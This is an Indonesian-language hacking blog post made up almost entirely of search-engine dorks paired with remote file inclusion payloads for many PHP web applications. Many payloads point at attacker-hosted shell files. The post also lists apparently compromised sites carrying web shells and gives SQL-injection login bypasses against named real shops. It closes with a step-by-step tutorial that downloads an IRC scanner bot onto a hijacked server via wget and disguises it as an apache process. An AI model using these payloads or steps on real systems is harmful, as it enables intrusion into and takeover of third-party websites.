allinurl:com_madeira
administrator/components/com_madeira/photoupload.php
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:com_calendar
/components/com_calendar.php?absolute_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
allinurl:com_galleria
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
inurl:”/index.php?option=com_rsgallery” or allinurl:com_rsgallery
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
allinurl:index.php?option view itemid site:.com
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered by Mambo”
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:com_galleria site:.il
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:com_minibb
/components/com_minibb.php?absolute_path=[INJEKAN]
/components/minibb/index.php?absolute_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:com_artlinks
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:com_remository
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:com_rsgallery
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:”com_phpshop”
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
inurl:”/com_smf”
/components/com_smf/smf.php?mosConfig_absolute_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
inurl:signup.php?usertype=pf
common.inc.php?CFG[libdir]=http://3-bius.com/xpl/c99.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
REMOTE COMMAND EXECUTION -buat simpan psy,exploiter and etc.
http://dublin.on.ca/downloads/adijoe.php
http://websiteweaving.com/remax/downloads/adijoe.php
http://scenicdrops.com/downloads/adijoe.php
http://prairielandkennels.com/content/adijoe.php
http://douglasdane.com/downloads/adijoe.php
http://papermodern.com/downloads/adijoe.php
http://janssendigitalimaging.com/downloads/adijoe.php
http://bbbsyorkton.com/downloads/adijoe.php
http://websiteweaving.com/remax/downloads/adijoe.php
http://scenicdrops.com/downloads/adijoe.php
http://tactusvocalensemble.com/downloads/adijoe.php
http://winnipeglawnservices.com/downloads/adijoe.php
http://tripps.ca/downloads/adijoe.php
http://airdriecanvas.ca/downloads/adijoe.php
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
“/cart.php?m=”
contoh : http://www.facesbyfelicia.com/store/cart.php?m=view
ganti tulisn cart.php?m=view dengan admin
jadi http://www.facesbyfelicia.com/store/admin
trus login pake sql username : ‘or”=” password :’or”=”
gud lak aw aw aw
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
keyword: “Powered by SunShop 3.2″
atau : inurl:”/sunshop/index.php?action=”
contoh http://www.dohertysgym.com/sunshop/index.php
ganti kata index.php dengan admin jadi : http://www.dohertysgym.com/sunshop/admin
login pake
user: admin
pass: ‘or”=’
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
“SQuery 4.5″ Or “SQuery 4.0″ Or “SQuery 3.9″ Or allinurl:modules.php?name=SQuery
/SQuery/lib/gore.php?libpath=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
inurl:register.php3?L=
/lib/connected_users.lib.php3?ChatPath=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
allinurl:”/auth/lostPassword.php”
/ldap/authldap.php?includePath=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
intitle:”Multimedia Flash Website Builder”
/sitebuilder/admin/top.php?admindir=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
“powered by geeklog”
/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
“software 2004-2005 by randshop”
contoh : http://www.dieterkropp.com/shop/themes/kategorie/index.php?id=20&katid=32&action=detail
injek : /includes/header.inc.php?dateiPfad=[INJEKAN]
jadi : www.dieterkropp.com/shop/includes/header.inc.php?dateiPfad=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
inurl:”/product.php?printable=” Or “powered by x-cart” Or inurl:”/home.php?printable=”
ganti tulisan itu semua dengan admin
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
“Advanced Poll” Or inurl:/admin/
/common.inc.php?base_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
inurl:”powered by cs-cart”
injek : classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item/txt?
/install.php?install_dir=http://elang13.org/item/txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
inurl:”/catalogue.php?cat=”
ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas ente ente sekalian nyari sqlnya hak hak hak
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
inurl:”/DoceboScs”
/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://elang13.org/hitam.txt?
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:”/DoceboCore”
/doceboCore/lib/lib.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:”/DoceboLms”
/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:”/DoceboKms” injek : /doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:”/DoceboCMS”
/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
allinurl:”dload.php”
/pafiledb/includes/pafiledb_constants.php?module_root_path=http://elang13.org/hitam.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
“powered by squirrelcart”
/squirrelcart/cart_content.php?cart_isp_root=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
keyword inurl:/ubbthreads/
/addpost_newpoll.php?addpoll=preview&thispath=http://elang13.org/hitam.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
allinurl:”index.php?target=categories”
/classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
“Exhibit Engine 1.5 RC 4″
/photo_comment.php?toroot=http://elang13.org/item.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
inurl:”/modules/Forums/
/admin/admin_users.php?phpbb_root_path=http://elang13.org/item.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
allinurl: includes/include_once.php
/includes/include_once.php?include_file=http://elang13.org/item.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
allinurl:/phplivehelper/blank.php
/initiate.php?abs_path=hhttp://elang13.org/item.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
“powered by DreamAccount”
injeknya :
/auth.cookie.inc.php?da_path=http://elang13.org/item.txt?
/auth.header.inc.php?da_path=http://elang13.org/item.txt?
/auth.sessions.inc.php?da_path=http://elang13.org/item.txt?
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“powered by PLUME CMS”
/prepend.php?_PX_config[manager_path]=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:option=frontpage site:.de
/index.php?option=frontpage&Itemid=system|uname|
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:”toplist.php” “powered by phpbb”
Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:guestbook.php “Advanced GuestBook” “powered by phpbb”
/admin/addentry.php?phpbb_root_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“ClanSys v1.1″ 2.400 pages.
/index.php?page=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
allinurl:coppermine site:.com
/modules/coppermine/themes/default/theme.php?THEME_DIR=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
allinurl:My_eGallery site:.com
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
allinurl:4nAlbum site:.com
/modules/4nAlbum/public/displayCategory.php?basepath=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
allinurl:/phplivehelper/blank.php
/initiate.php?abs_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
allinurl:Powered by PHPNuke-Clan site:.com -_or_- “Powered by PHPNuke-Clan”
/modules/vWar_Account/includes/functions_common.php?vwar_root2=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
“Powered by AngelineCMS v0.8.1″ -_or_- “Powered by AngelineCMS v0.8.” -_or_- “Powered by AngelineCMS” filetype:php
/kernel/loadkernel.php?installPath=[INJEKAN]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
“Powered By: SQuery”
/lib/armygame.php?libpath=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
“Powered by Claroline”
/learnPath/include/scormExport.inc.php?includePath=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
“Powered by: Virtual War”
/includes/functions_install.php?vwar_root=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
“index.php?page=”
/index.php?page=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
ImpExData.php
/impex/ImpExData.php?systempath=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered by KnowledgebasePublisher”
/client/faq_1/PageController.php?dir=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered by SMartBlog”
/index.php?page=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered by iUser” -_or_- intitle:”iUser Admin” -_or_- intitle:”iUser Management System”
/common.php?include_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“PhpGedView User Login”
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“powered by PLUME CMS”
/dir/prepend.php?_PX_config[manager_path]=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered by HostAdmin”
/directory/index.php?path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:”*.php?mode=tour” friend -_or_- inurl:”*.php?mode=join” friend
/directory/index.php?mode=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered by CubeCart 3.0.6″ -_OR_- “Powered by CubeCart 3.0.5″ -_OR_- “Powered by CubeCart 3.0.4″
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered by BosClassifieds Classified Ads System”
/index.php?insPath=[INJEKAN]
/recent.php?insPath=[INJEKAN]
/account.php?insPath=[INJEKAN]
/classified.php?insPath=[INJEKAN]
/search.php?insPath=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“powered by DreamAccount”
/auth.cookie.inc.php?da_path=[INJEKAN]
/auth.header.inc.php?da_path=[INJEKAN]
/auth.sessions.inc.php?da_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:/phplivehelper/blank.php
/initiate.php?abs_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
includes/include_once.php
/includes/include_once.php?include_file=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:”/modules/Forums/
/admin/admin_users.php?phpbb_root_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Exhibit Engine 1.5 RC 4″
/photo_comment.php?toroot=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“index.php?target=categories”
/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:/ubbthreads/
/addpost_newpoll.php?addpoll=preview&thispath=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
dork : Powered by: Virtual War v1.5.0
Exploit :
/war.php?vwar_root=[INJEKAN]
/member.php?vwar_root=[INJEKAN]
/calendar.php?vwar_root=[INJEKAN]
/challenge.php?vwar_root=[INJEKAN]
/joinus.php?vwar_root=[INJEKAN]
/news.php?vwar_root=[INJEKAN]
/stats.php?vwar_root=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:”index2.php?option=rss” -_OR_- “powered By Limbo CMS”
/classes/adodbt/sql.php?classes_dir=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:phpGedView site:.com
/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:PNphpBB2 site:.com
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
oneadmin site:.com
/oneadmin/config.php?path[docroot]=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
”activity.php?page=hof”
/language/lang_english/lang_activity.php?phpbb_root_path=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“powered by edit-x”
/editx/add_address.php?include_dir=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
allinurl:/DoceboScs site:.il
/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
allinurl:/DoceboCore site:.il
/ doceboCore/lib/lib.php?GLOBALS[where_framework]=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
allinurl:/DoceboLms site:.il
/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
allinurl:/DoceboKms site:.il
/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
allinurl:/DoceboCMS site:.il
/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=[INJEKAN]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:/cl_files/
/calendar.php?path_to_calendar=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“powered by Php Blue Dragon Platinum”
/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:classified.php phpbazar
/classified_right.php?language_dir=[Injekan]
http://www.aperfectspot.com/it/classified_right.php?language_dir=
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:”/mediumCMS”
/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“include/inc_foot.php”
/include/inc.foot.php?root=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered by Plume:cms\”
http://localhost/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls -al&_PX_config[manager_path]=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“powered by WonderEdit Pro”
http://[target]/[path]/template/rwb/user_bottom.php?config[template_path]=[Injekan]
http://[target]/[path]/template/gwb/user_bottom.php?config[template_path]=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:”/questcms/”
http://[target]/[questcms_path]/main/main.php?pi=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
inurl:”phpwcms/index.php?id=”
/include/inc_ext/spaw/dialogs/table.php?spaw_root=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“powered by php mysql simple cms”
/admin/config_pages.php?loggedin=1
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered by UNAK-CMS”
sitename.com/[ScriptPath]/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=[Injekan]
/fckeditor/editor/dialog/fck_link.php?dirroot=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“powered by: profitCode”
http://[url]/index.php?proMod=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“News Managed by Ditto News”
http://www.site.com/[XtremeNews_path]/sources/post.php?fil_config=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered by Minerva 237″
http://www.site.com/[Minerva_path]/stat_modules/users_age/module.php?phpbb_root_path=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:/m2f_usercp.php?
/m2f/m2f_phpbb204.php?m2f_root_path=[Injekan]
/m2f/m2f_forum.php?m2f_root_path=[Injekan]
/m2f/m2f_mailinglist.php?m2f_root_path=[Injekan]
/m2f/m2f_cron.php?m2f_root_path=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered By TSEP”
http://hax.com/tsep/include/colorswitch.php?tsep_config[absPath]=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl:/modernbill/
/modernbill/include/html/config.php?DIR=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered by phpCC Beta 4.2″
/login.php?base_dir=[Injekan]
/reactivate.php?base_dir=[Injekan]
/register.php?base_dir=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“powergap” or “s04.php” or s01.php or s02.php
http://sitename.com/s01.php?shopid=http://SHELLURL.COM?
http://sitename.com/s01.php?shopid=http://SHELLURL.COM?
http://sitename.com/s02.php?shopid=http://SHELLURL.COM?
http://sitename.com/s03.php?shopid=http://SHELLURL.COM?
http://sitename.com/s04.php?shopid==http://SHELLURL.COM
or
http://sitename.com/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://SHELLURL.COM
http://sitename.com/sid=http://SHELLURL.COM
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered By phpCOIN 1.2.3″
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
allinurl : /web3news/
/security/include/_class.security.php?PHPSECURITYADMIN_PATH=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
powered by: phpecard
/functions.php?include_path=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Dernière version de la Prémod Shadow sur phpBB.biz”
/includes/functions_portal.php?phpbb_root_path=[Injekan]
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=
“Powered By Aardvark Topsites PHP 4.2.2″
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=[Injekan]
Senin, 06 Juli 2009
Jumat, 26 Juni 2009
Saya mau menjelaskan sedikit cara mencari target/shell melalui bot scanner RFI di irc. Anda bisa dapatkan scriptnya di page script collection blog saya ini. saya anggap anda sudah mengerti sedikit mengenai command linux dan injection web. disini saya menggunakan shell c99 dan r57 sebagai panduannya.
ok.. kita mulai.
- Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam format txt, ato anda juga bisa langsung menggunakan milik saya
- Masuk ke shell anda
- cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
- jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp
- wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya rekan saya, jadi commandnya “wget pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
- jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
- kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt
- Saya anggap script tersebut udah di upload, maka jalankan commandnya “perl namafile server nick ident channel owner fakeproccess” contohnya ” perl scan.txt irc.dal.net bugzz bug balihackerlink LeNK /usr/sbin/apache”
- Jika berhasil, di shell anda akan keluar tulisan.. dan di channel yang anda join, bot akan pm anda dan beri salam “you are my master”
- Untuk mengetahui command yang dipake, pm bot dan ketik !cmdx @help
- Silahkan dipergunakan sebaik mungkin
Ket :
- Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
- Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
- Semua command di atas tanpa tanda petik dua (”)
Semoga membantu…
Credit to : dr.pluto
Editing sedikit :
banyak rekan yang menanyakan kenapa bot tidak jalan? banyak faktor yang menyebabkan hal tersebut
- Shell lambat
- Script yang tidak mau jalan di shell
sebenarnya, jika bot sudah masuk ke channel dan bot telah pm/pv anda dengan kata “You are my master” itu tandanya bot telah jalan. Jadi coba dengan command !cmdx @help saat pv/pm bot untuk melihat list helpnya. Script ini masih berfungsi setelah saya coba..
Dan untuk selanjutnya, mungkin akan saya buat artikel mengenai bot scan yang lainnya. jadi harap ditunggu.. 
Langganan:
Postingan (Atom)